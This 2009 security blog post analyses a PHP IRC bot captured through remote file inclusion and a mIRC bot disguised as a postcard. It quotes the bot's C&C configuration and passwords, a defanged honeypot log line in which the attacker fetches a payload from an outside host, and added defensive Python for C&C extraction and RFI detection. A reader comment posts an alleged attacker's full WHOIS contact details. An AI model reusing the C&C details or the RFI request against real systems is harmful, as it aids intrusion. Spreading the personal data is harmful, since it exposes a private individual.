Sunday, January 04, 2009

PBot a PHP Bot found in Honeypots RFIs

While going through a couple dozen newer RFIs, I found a suspect file that turned out to be more than the usual RFI. I thought some of my readers would like more information on this one. The file was called pbot.txt, and was downloaded from a server in Taiwan.

This file turns out to be a decently coded PHP Bot which connects to an IRC C&C. The IRC Server is located at irc.indoirc.net - which hosts a handful of smaller botnets, but also appears to be somewhat legitimate.

The bot joins a C&C channel, in this case #AnakDompu, and waits for commands. This version of the bot allows for UDP and TCP flooding, and a connect back shell. The shell is written in perl and is commonly found in many perl bots and newbie hacker kits. Google searches for dc.pl will turn up many examples.

The bot contains the dc.pl perl script as base64 encoded text. Since webservers commonly run in datacenters with a good deal of bandwidth, the TCP and UDP flooding capabilities are generally more successful than those on a home machine with limited upload speed.

A couple thousand of these bots could easily compare to 30 or 40 thousand DSL/cable user bots. Lucky for us, there are only 36 bots connected at this time.

I'm sure the bot author is still wondering why his commands aren't working on my snoopbot. He hasn't kicked/banned the fake bot, and continues to issue commands that just don't work.

Normally I have to work to strip out the C&C information out of the bots. These guys made it easier on me...

"server"=>"irc.indoirc.net",
"port"=>"6667",
"pass"=>"Walau.Jelek.Tetap.Bilang.Cakep.La",
"prefix"=>"ManieZ",
"maxrand"=>8,
"chan"=>"#AnakDompu",
"chan2"=>"#AnakDompu",
"key"=>"",
"modes"=>"+iBx",
"password"=>"AnakDompu",
"trigger"=>"~",
"hostauth"=>"Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc" // * for any hostname
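Pulling the C&C details and the embedded payload out of a file like this can be scripted rather than done by hand. The following is an added example, not code from this post or from the bot itself; it runs on a constructed sample in the same "key"=>"value" shape as the config quoted above, with an example hostname in place of the real server and a harmless two-line placeholder standing in for the base64-encoded dc.pl. The function names are my own.

```python
import base64
import re

# Constructed sample standing in for a file like pbot.txt: a config array in the
# same "key"=>"value" shape quoted in the post, plus a base64 blob where the bot
# keeps its embedded script. The blob encodes a harmless placeholder, not dc.pl;
# the server name is a reserved example hostname.
EMBEDDED_SCRIPT = b"#!/usr/bin/perl\n# constructed placeholder for an embedded script\n"
SAMPLE_PHP = (
    '<?php\n'
    '$config = array(\n'
    '  "server"=>"irc.example.invalid",\n'
    '  "port"=>"6667",\n'
    '  "prefix"=>"ManieZ",\n'
    '  "maxrand"=>8,\n'
    '  "chan"=>"#AnakDompu",\n'
    '  "trigger"=>"~",\n'
    '  "hostauth"=>"*" // * for any hostname\n'
    ');\n'
    '$dcpl = "' + base64.b64encode(EMBEDDED_SCRIPT).decode() + '";\n'
)

# "key"=>"string" or "key"=>number, as PHP array literals are written
CONFIG_RE = re.compile(r'"(\w+)"\s*=>\s*(?:"([^"]*)"|(\d+))')
# runs of base64 alphabet long enough to be a payload rather than a word
BLOB_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')


def extract_config(src):
    """Pull "key"=>value pairs out of PHP source; all values come back as strings."""
    cfg = {}
    for key, quoted, number in CONFIG_RE.findall(src):
        cfg[key] = number if number else quoted
    return cfg


def find_embedded_scripts(src):
    """Decode long base64 runs and return the first line of each that is a script."""
    found = []
    for blob in BLOB_RE.findall(src):
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if data.startswith(b"#!"):
            found.append(data.split(b"\n", 1)[0].decode("ascii", "replace"))
    return found


def c2_indicators(src):
    """Summarise what an analyst wants from the file: server, channels, nick shape, payload."""
    cfg = extract_config(src)
    return {
        "server": cfg.get("server"),
        "port": cfg.get("port"),
        "channels": sorted({cfg[k] for k in ("chan", "chan2") if cfg.get(k)}),
        # prefix followed by up to maxrand random digits, as the bot builds its nick
        "nick_pattern": cfg.get("prefix", "") + r"\d{1," + cfg.get("maxrand", "0") + "}",
        "trigger": cfg.get("trigger"),
        "embedded_scripts": find_embedded_scripts(src),
    }


if __name__ == "__main__":
    for k, v in c2_indicators(SAMPLE_PHP).items():
        print(f"{k}: {v}")
```

The nick pattern and channel list are exactly what feeds an IRC signature later; the decoded first line tells you what the blob is without having to run anything.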

Most of the standard IRC IDS Signatures will work in this case.
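To make "standard IRC IDS signatures" concrete, here is an added example (not code from this post or from any IDS product) that applies four of the usual checks to a constructed client-side IRC session: a nick built from a fixed prefix plus random digits, a JOIN to a known C&C channel, a trigger-prefixed command in that channel, and the known C&C server name appearing in the session. The channel, nick prefix, modes and server name are the values quoted from the bot's config; the command and the rest of the session are made up.

```python
import re

# Constructed client-side IRC session as a compromised web host would emit it.
# Channel, nick prefix, modes and server are the values from the bot config in
# the post; "~uptime" is an invented trigger command for illustration.
SAMPLE_SESSION = [
    "NICK ManieZ48213901",
    "USER pbot 8 * :pbot",
    "JOIN #AnakDompu",
    "MODE ManieZ48213901 +iBx",
    ":herder!u@h PRIVMSG #AnakDompu :~uptime",
    "PRIVMSG #AnakDompu :uptime: 3 days",
    "PING :irc.indoirc.net",
]

# nick = letters/underscore prefix followed by 1-8 digits (the bot's maxrand)
NICK_RE = re.compile(r"^NICK\s+:?([A-Za-z][A-Za-z0-9_]*?)(\d{1,8})$")
JOIN_RE = re.compile(r"^JOIN\s+(#\S+)", re.I)
CMD_RE = re.compile(r"PRIVMSG\s+(#\S+)\s+:(\S)")
PING_RE = re.compile(r"^PING\s+:?(\S+)", re.I)


def scan_irc(lines, channels, servers, prefix, trigger):
    """Return (line_no, rule) pairs for lines that match a C&C signature."""
    chans = {c.lower() for c in channels}
    srvs = {s.lower() for s in servers}
    hits = []
    for n, line in enumerate(lines, 1):
        m = NICK_RE.match(line)
        if m and m.group(1) == prefix:
            hits.append((n, "nick-prefix-plus-random-digits"))
        m = JOIN_RE.match(line)
        if m and m.group(1).lower() in chans:
            hits.append((n, "join-cnc-channel"))
        m = CMD_RE.search(line)
        if m and m.group(1).lower() in chans and m.group(2) == trigger:
            hits.append((n, "trigger-command-in-channel"))
        m = PING_RE.match(line)
        if m and m.group(1).lower() in srvs:
            hits.append((n, "known-cnc-server"))
    return hits


if __name__ == "__main__":
    for n, rule in scan_irc(SAMPLE_SESSION, ["#AnakDompu"], ["irc.indoirc.net"], "ManieZ", "~"):
        print(f"line {n}: {rule}: {SAMPLE_SESSION[n - 1]}")
```

The bot's own reply on line 6 is not flagged because it does not start with the trigger character; in practice the strongest signal on a web server is simpler than any of these: the host should not be speaking IRC outbound on 6667 at all.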

Note: Monitoring bots should always be done with the consent of your ISP. I have permission from my ISPs to perform these monitoring activities and to run Honeypots. As they say, don't try this at home.

For those who know what they're doing, and are authorized by their ISPs to do so, my honeypot log entry is provided below.

89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET --VULNERABILITY REDACTED--=http:// c-a-k-e-p.co.cc /adu /pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"

Note, the 200 status code is a feature of my honeypot - it returns 200 for all pages, found or not. I added the spaces above to keep from accidental clicks. I removed the vulnerable page information, because I don't think it's helpful to give that level of detail.
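The log entry above carries the three things a detection rule for RFI probes keys on: a query parameter whose value is a full remote URL, the trailing "???" the attack tools append, and the libwww-perl user agent. This added example (not code from this post or from any honeypot) parses constructed lines in the same combined format, with the honeypot's extra "-" field after the byte count reproduced, and reports which indicators each request carries. The vulnerable script name and IP addresses in the sample are placeholders.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed log lines in the same combined format as the honeypot entry above.
# Line 1 mimics an RFI probe (placeholder script name, documentation IPs);
# line 2 is benign; line 3 has the user agent alone, as a false-positive check.
SAMPLE_LOG = [
    '198.51.100.23 - - [01/Jan/2009:14:18:37 -0500] "GET /vuln.php?page=http://203.0.113.9/adu/pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"',
    '198.51.100.24 - - [01/Jan/2009:14:20:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 512 - "-" "Mozilla/5.0" "-"',
    '198.51.100.25 - - [01/Jan/2009:14:21:40 -0500] "GET /robots.txt HTTP/1.1" 200 64 - "-" "libwww-perl/5.805" "-"',
]

# combined log format; the optional "(?: \S+)?" absorbs the honeypot's extra field
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: \S+)? '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.I)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_indicators(entry):
    """List the RFI-related indicators present in one parsed entry."""
    found = []
    query = urlparse(entry["target"]).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if any(REMOTE_RE.match(v) for v in values):
            found.append("remote-url-in-param:" + name)
    if query.endswith("??"):
        found.append("trailing-query-marks")
    if "libwww-perl" in entry["ua"]:
        found.append("ua-libwww-perl")
    return found


def scan_log(lines):
    """Map source IP to indicators, reporting only requests with a remote URL in a parameter.

    The user agent and the trailing question marks are supporting evidence only;
    a remote URL handed to a script parameter is what makes it an RFI attempt.
    """
    report = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        inds = rfi_indicators(entry)
        if any(i.startswith("remote-url-in-param") for i in inds):
            report[entry["ip"]] = inds
    return report


if __name__ == "__main__":
    for ip, inds in scan_log(SAMPLE_LOG).items():
        print(ip, ", ".join(inds))
```

Because the honeypot answers 200 to everything, the status code is useless as a filter here; on a real server a 200 on such a request is the signal that the include actually happened.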

--- Another IRC bot:

A postcard? -- Nah.. A MIRC bot.

This little jewel comes from our mailbag. It was included as a binary, no source host for infection.

The file, postcard.exe, is actually a RAR compressed SFX archive. When run, a RAR script that calls a batch file is launched. The batch file opens a mountain scene picture entitled xmas.jpg.

It also runs a copy of MIRC and places that same binary in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
It uses a likely stolen/generated MIRC license ending with 6732.

It installs itself in C:\Windows\temp\spoolsv\spoolsv.exe - which would be okay, except that directory isn't writable on my system as a normal user. That and the location of the run key mean it will only infect those who run with administrator rights.

MIRC Bots are scripted by those not experienced. Those that connect to public IRC servers like UnderNET prove the author's inexperience.

This one joins the channel #romania on Undernet. I'm sure the IRCOps will be on it before too long, if they actually have any hosts - I didn't bother to check.


1 Comments:

Blogger Mark Arena said...

Have a look at:
http://bl4ckb0t.biz/?p=112 - this guy is one of the regulars of the IRC network you've mentioned.

That IRC network also houses an Indonesian hacking group (cannot remember the name). They have a bot that scans hosts for SQL injection vulnerabilities.

They probably wouldn't be that hard to track down (see below whois information of bl4ckb0t.biz)

Domain Name BL4CKB0T.BIZ
Domain ID D27915184-BIZ
Sponsoring Registrar ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID 82
Domain Status clientTransferProhibited
Registrant ID OLN137430280
Registrant Name Abhie Ganteng
Registrant Organization Abhie Ganteng
Registrant Address1 Jln. Parakang Street 666
Registrant City Macazzart City
Registrant State/Province Sulawesi Selatan Sulawesi Selatan
Registrant Postal Code 90233
Registrant Country Indonesia
Registrant Country Code ID
Registrant Phone Number +62.8124107863
Registrant Facsimile Number +62.8124107863
Registrant Email 0wn3d@indohackerlink.com
Administrative Contact ID OLN137430281
Administrative Contact Name Abhie Ganteng
Administrative Contact Organization Abhie Ganteng
Administrative Contact Address1 Jln. Parakang Street 666
Administrative Contact City Macazzart City
Administrative Contact State/Province Sulawesi Selatan Sulawesi Selatan
Administrative Contact Postal Code 90233
Administrative Contact Country Indonesia
Administrative Contact Country Code ID
Administrative Contact Phone Number +62.8124107863
Administrative Contact Facsimile Number +62.8124107863
Administrative Contact Email 0wn3d@indohackerlink.com
Billing Contact ID OLN137430285
Billing Contact Name Abhie Ganteng
Billing Contact Organization Abhie Ganteng
Billing Contact Address1 Jln. Parakang Street 666
Billing Contact City Macazzart City
Billing Contact State/Province Sulawesi Selatan Sulawesi Selatan
Billing Contact Postal Code 90233
Billing Contact Country Indonesia
Billing Contact Country Code ID
Billing Contact Phone Number +62.8124107863
Billing Contact Facsimile Number +62.8124107863
Billing Contact Email 0wn3d@indohackerlink.com
Technical Contact ID OLN137430282
Technical Contact Name Abhie Ganteng
Technical Contact Organization Abhie Ganteng
Technical Contact Address1 Jln. Parakang Street 666
Technical Contact City Macazzart City
Technical Contact State/Province Sulawesi Selatan Sulawesi Selatan
Technical Contact Postal Code 90233
Technical Contact Country Indonesia
Technical Contact Country Code ID
Technical Contact Phone Number +62.8124107863
Technical Contact Facsimile Number +62.8124107863
Technical Contact Email 0wn3d@indohackerlink.com
Name Server NS1.EVERYDNS.NET
Name Server NS2.EVERYDNS.NET
Created by Registrar ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Last Updated by Registrar ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date Wed Oct 29 07:35:21 GMT 2008
Domain Expiration Date Wed Oct 28 23:59:59 GMT 2009
Domain Last Updated Date Tue Dec 23 23:19:36 GMT 2008

He also seems to have the following email addresses and domains registered:
"bl4ck3n91n3@Phreaker.net";
"punkhackerboy@gmail.com";
"bl4ck_3n91n3@hackermail.com";
"qalby_08@yahoo.co.id";
Muh. Nur Alim Qalby
http://bl4ckb0t.biz -
http://bl4ckb0t.net -
http://bl4ckb0t.com -
http://fuckserv.net

05 January, 2009 13:53  
